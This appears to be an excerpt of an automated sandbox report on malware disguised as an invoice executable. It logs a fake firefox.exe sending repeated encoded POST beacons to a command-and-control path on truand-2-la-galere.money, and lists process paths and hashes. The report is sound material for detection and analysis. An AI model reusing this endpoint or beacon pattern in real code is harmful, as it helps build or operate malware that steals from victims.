2018-05-07 12:50:01 UTC506OUTData Raw: 4a 0a 05 4d 1e 57 4f 1a 15 0b 58 14 72 5d 58 45 0b 14 17 05 18 05 4b 53 4a 09 35 68 25 5c 56 56 56 14 20 5a 02 42 58 43 69 09 02 40 07 17 13 05 50 44 75 57 43 50 47 54 3c 6b 3d 75 52 5b 07 06 44 7e 54 03 17 50 19 64 5f 55 1f 53 11 11 01 55 19 2b 33 78 32 2c 3e 3e 21 0b 5b 53 5b 5c 11 72 0c 14 58 59 53 39 6f 2e 0b 42 51 0e 08 59 19 72 5a 46 03 50 0c 49 10 57 0a 4b 53 17 53 45 1b 4c 5e 52 14 51 59 14 64 62 4d 6b 3d 79 59 4e 0c 0f 08 59 18 2f 05 51 57 40 56 5a 07 58 00 54 10 30 5c 17 15 50 01 00 3e 3e 2b 0d 57 46 58 4a 5e 57 10 46 78 52 50 5d 06 06 44 70 57 0f 01 18 58 5a 57 14 24 43 10 58 5e 06 4a 16 43 0b 52 54 03 39 6c 2e 55 42 56 19 09 11 31 16 53 55 42 51 45 57 54 35 32 21 0b 55 49 55 47 5d 04 5f 0f 58 44 1a 19 35 02 5a 09 45 55 5b 14 44 40 5c 52 19 03
Data Ascii: JMWOXr]XEKSJ5h%\VVV ZBXCi@PDuWCPGT<k=uR[D~TPd_USU+3x2,>>![S[\rXYS9o.BQYrZFPIWKSSEL^RQYdbMk=yYNY/QW@VZXT0\P>>+WFXJ^WFxRP]DpWXZW$CX^JCRT9l.UBV1SUBQEWT52!UIUG]_XD5ZEU[D@\R
2018-05-07 12:50:01 UTC506INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:50:01 UTC506INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
30192.168.1.814919591.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:50:56 UTC514OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:50:56 UTC514OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:50:57 UTC514INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:50:57 UTC514INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
31192.168.1.814919691.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:50:58 UTC514OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:50:58 UTC514OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:50:59 UTC514INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:50:59 UTC515INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
32192.168.1.814919791.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:51:00 UTC515OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:51:00 UTC515OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:51:01 UTC515INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:51:01 UTC515INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
33192.168.1.814919891.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:51:02 UTC515OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:51:02 UTC515OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:51:03 UTC515INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:51:03 UTC515INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
34192.168.1.814919991.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:51:05 UTC515OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:51:05 UTC515OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:51:05 UTC515INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:51:05 UTC516INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
35192.168.1.814920091.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:51:06 UTC516OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:51:06 UTC516OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:51:07 UTC516INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:51:07 UTC516INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
36192.168.1.814920191.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:51:08 UTC516OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:51:08 UTC516OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:51:09 UTC516INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:51:09 UTC516INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
37192.168.1.814920291.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:51:09 UTC516OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:51:09 UTC516OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:51:10 UTC516INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:51:10 UTC516INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
38192.168.1.814920391.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:51:11 UTC516OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:51:11 UTC517OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:51:11 UTC517INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:51:11 UTC517INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
39192.168.1.814920491.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:51:12 UTC517OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:51:12 UTC517OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:51:12 UTC517INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:51:12 UTC517INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
4192.168.1.814916891.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:50:18 UTC506OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 35
Cache-Control: no-cache
2018-05-07 12:50:18 UTC507OUTData Raw: 50 0b 05 56 1e 53 4f 05 1a 55 48 04 4b 00 02 07 5d 56 02 48 5a 41 0e 06 10 59 41 0e 0b 4a 45 04 4f 01 56
Data Ascii: PVSOUHK]VHZAYAJEOV
2018-05-07 12:50:19 UTC507INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:50:19 UTC507INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
40192.168.1.814920591.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:51:13 UTC517OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:51:13 UTC517OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:51:13 UTC517INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:51:13 UTC517INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
41192.168.1.814920691.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:51:15 UTC517OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:51:15 UTC517OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:51:15 UTC517INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:51:15 UTC518INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
42192.168.1.814920791.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:51:16 UTC518OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:51:16 UTC518OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:51:16 UTC518INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:51:16 UTC518INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
43192.168.1.814920891.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:51:17 UTC518OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:51:17 UTC518OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:51:17 UTC518INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:51:17 UTC518INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
44192.168.1.814920991.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:51:18 UTC518OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:51:18 UTC518OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:51:19 UTC518INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:51:19 UTC518INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
45192.168.1.814921091.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:51:20 UTC518OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:51:20 UTC519OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:51:20 UTC519INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:51:20 UTC519INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
46192.168.1.814921191.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:51:21 UTC519OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:51:21 UTC519OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:51:21 UTC519INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:51:21 UTC519INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
47192.168.1.814921291.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:51:22 UTC519OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:51:22 UTC519OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:51:22 UTC519INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:51:22 UTC519INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
48192.168.1.814921391.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:51:23 UTC519OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:51:23 UTC519OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:51:24 UTC519INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:51:24 UTC520INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
49192.168.1.814921491.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:51:25 UTC520OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:51:25 UTC520OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:51:25 UTC520INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:51:25 UTC520INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
5192.168.1.814916991.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:50:20 UTC507OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:50:20 UTC507OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:50:20 UTC507INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:50:20 UTC507INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
50192.168.1.814921591.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:51:26 UTC520OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:51:26 UTC520OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:51:27 UTC520INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:51:27 UTC520INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
51192.168.1.814921691.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:51:27 UTC520OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:51:27 UTC520OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:51:28 UTC520INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:51:28 UTC521INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
52192.168.1.814921791.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:51:28 UTC521OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:51:28 UTC521OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:51:29 UTC521INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:51:29 UTC521INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
53192.168.1.814921891.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:51:30 UTC521OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:51:30 UTC521OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:51:30 UTC521INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:51:30 UTC521INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
54192.168.1.814921991.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:51:31 UTC521OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:51:31 UTC521OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:51:32 UTC521INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:51:32 UTC521INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
55192.168.1.814922091.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:51:32 UTC521OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:51:32 UTC522OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:51:33 UTC522INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:51:33 UTC522INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
56192.168.1.814922191.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:51:34 UTC522OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:51:34 UTC522OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:51:34 UTC522INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:51:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:51:34 UTC522INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
6192.168.1.814917091.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:50:22 UTC507OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:50:22 UTC507OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:50:22 UTC507INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:50:22 UTC507INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
7192.168.1.814917291.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:50:24 UTC507OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:50:24 UTC507OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:50:25 UTC507INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:50:25 UTC508INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
8192.168.1.814917391.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:50:25 UTC508OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:50:25 UTC508OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:50:26 UTC508INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:50:26 UTC508INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortProcess
9192.168.1.814917491.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:50:26 UTC508OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 7
Cache-Control: no-cache
2018-05-07 12:50:26 UTC508OUTData Raw: 49 0c 0d 5e 1e 50 03
Data Ascii: I^P
2018-05-07 12:50:27 UTC508INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:50:27 UTC508INData Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

General

Start time:14:49:19
Start date:07/05/2018
Path:C:\Users\user\Desktop\facture_1398665.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\facture_1398665.exe'
Imagebase:0x400000
File size:2153784 bytes
MD5 hash:FE1214A06FFC40B1EBB524F185894487
Has administrator privileges:true
Programmed in:Borland Delphi
Reputation:low

General

Start time:14:49:20
Start date:07/05/2018
Path:C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
Wow64 process (32bit):false
Commandline:'C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp' /SL5='$7016C,1728489,170496,C:\Users\user\Desktop\facture_1398665.exe'
Imagebase:0x400000
File size:1228800 bytes
MD5 hash:9AE8DFC6C5CB2222DBD09F1176058373
Has administrator privileges:true
Programmed in:Borland Delphi
Reputation:low

General

Start time:14:49:23
Start date:07/05/2018
Path:C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
Wow64 process (32bit):false
Commandline:C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
Imagebase:0x1350000
File size:531408 bytes
MD5 hash:52FFABA4273678BAE75442F2BC85B470
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

General

Start time:14:49:26
Start date:07/05/2018
Path:C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
Wow64 process (32bit):false
Commandline:C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
Imagebase:0xfa0000
File size:531408 bytes
MD5 hash:52FFABA4273678BAE75442F2BC85B470
Has administrator privileges:true
